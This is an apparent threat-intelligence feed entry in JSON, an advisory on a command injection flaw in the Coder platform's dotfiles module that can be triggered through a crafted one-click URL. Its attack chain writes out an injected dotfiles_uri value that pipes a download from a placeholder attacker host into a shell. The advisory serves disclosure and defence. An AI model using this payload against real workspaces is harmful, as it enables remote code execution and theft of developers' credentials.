{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/tags/workspace/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["coder/registry","go/github.com/coder/coder/v2 (\u003c 2.29.7)","go/github.com/coder/coder/v2 (\u003e= 2.30.0, \u003c 2.30.2)","go/github.com/coder/coder (\u003c= 0.27.3)"],"_cs_severities":["high"],"_cs_tags":["command-injection","rce","web-application","workspace","cloud","coder"],"_cs_type":"advisory","_cs_vendors":["Coder"],"content_html":"\u003cp\u003eThe Coder platform, a developer workspace environment, is affected by a critical command injection vulnerability (CVE-2026-44454) present in its \u003ccode\u003edotfiles\u003c/code\u003e module within the \u003ccode\u003ecoder/registry\u003c/code\u003e component. Disclosed by Aviv Donenfeld and published on 2026-07-02, this flaw arises because the module directly interpolates unsanitized user-provided \u003ccode\u003edotfiles_uri\u003c/code\u003e values into shell commands, allowing for arbitrary code execution. This vulnerability is amplified by the \u003ccode\u003emode=auto\u003c/code\u003e feature on the Create Workspace page of the \u003ccode\u003ecoder/coder\u003c/code\u003e application (versions prior to 2.29.7, and 2.30.0 through 2.30.1), which enables a one-click attack. An authenticated user clicking a specially crafted URL can trigger silent workspace creation with a malicious \u003ccode\u003edotfiles_uri\u003c/code\u003e, leading to immediate RCE within their provisioned workspace. The vulnerability impacts customer instances of Coder and can lead to compromise of developer environments and sensitive data.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker crafts a malicious URL targeting a victim's Coder deployment, including \u003ccode\u003emode=auto\u003c/code\u003e and a \u003ccode\u003eparam.dotfiles_uri\u003c/code\u003e value containing shell metacharacters and arbitrary commands (e.g., \u003ccode\u003efoo$(curl https://attacker.example/x | sh).com\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe attacker delivers this URL to an authenticated Coder user (e.g., via email or messaging).\u003c/li\u003e\n\u003cli\u003eThe victim clicks the crafted URL, which directs their browser to the Coder Create Workspace page.\u003c/li\u003e\n\u003cli\u003eDue to the \u003ccode\u003emode=auto\u003c/code\u003e parameter, the Coder platform bypasses the confirmation prompt and automatically initiates the creation of a new workspace, pre-filling parameters including the attacker-controlled \u003ccode\u003eparam.dotfiles_uri\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eDuring the workspace provisioning process, the \u003ccode\u003edotfiles\u003c/code\u003e module in \u003ccode\u003ecoder/registry\u003c/code\u003e attempts to process the provided \u003ccode\u003edotfiles_uri\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe unsanitized \u003ccode\u003edotfiles_uri\u003c/code\u003e value is directly expanded by a shell, leading to command injection and the execution of the attacker's arbitrary commands (e.g., \u003ccode\u003ecurl https://attacker.example/x | sh\u003c/code\u003e) within the context of the newly created workspace.\u003c/li\u003e\n\u003cli\u003eThe attacker's arbitrary code gains execution inside the victim's workspace, establishing a foothold for further malicious activities.\u003c/li\u003e\n\u003cli\u003eThe attacker can then access Git credentials, secrets, workspace files, or perform lateral movement within the Coder environment, achieving the final objective.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-44454 leads to arbitrary code execution within the victim's Coder workspace. This can result in the compromise of sensitive data, including Git credentials, API keys, and other secrets stored within the development environment, as well as the exfiltration of source code and other workspace files. Depending on the privileges assigned to the compromised workspace, this could also provide a significant foothold for lateral movement into connected systems or cloud infrastructure. The \u0026quot;one-click\u0026quot; nature of the \u003ccode\u003emode=auto\u003c/code\u003e amplification vector significantly lowers the bar for exploitation, requiring only that an authenticated user interacts with a malicious link, making it a severe threat to organizations utilizing the Coder platform.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ePatch Coder deployments immediately by upgrading \u003ccode\u003ecoder/coder\u003c/code\u003e to at least version \u003ccode\u003ev2.29.7\u003c/code\u003e (ESR) or \u003ccode\u003ev2.30.2\u003c/code\u003e (mainline) to implement the consent dialog for \u003ccode\u003emode=auto\u003c/code\u003e and to apply the primary fix for CVE-2026-44454.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule to detect attempts at exploiting CVE-2026-44454 in webserver logs.\u003c/li\u003e\n\u003cli\u003eMonitor webserver logs for \u003ccode\u003ecs-uri-query\u003c/code\u003e containing \u003ccode\u003emode=auto\u003c/code\u003e and \u003ccode\u003eparam.dotfiles_uri\u003c/code\u003e with shell metacharacters, as identified in the Sigma rule.\u003c/li\u003e\n\u003cli\u003eBlock the C2 domain \u003ccode\u003eattacker.example\u003c/code\u003e listed in the IOC table at the DNS resolver and perimeter firewalls.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-07-03T11:50:24Z","date_published":"2026-07-03T11:50:24Z","id":"https://feed.craftedsignal.io/briefs/2026-07-coder-workspace-rce/","summary":"A command injection vulnerability (CVE-2026-44454) in the Coder platform's `dotfiles` module allows arbitrary code execution in a user's workspace, exploitable via a one-click attack using the `mode=auto` feature on the Create Workspace page that automatically provisions a workspace with a malicious `param.dotfiles_uri` without user consent, leading to immediate arbitrary code execution and potential data compromise or lateral movement.","title":"Coder vulnerable to workspace auto-creation via crafted URL parameters without user consent","url":"https://feed.craftedsignal.io/briefs/2026-07-coder-workspace-rce/"}],"language":"en","title":"CraftedSignal Threat Feed - Workspace","version":"https://jsonfeed.org/version/1.1"}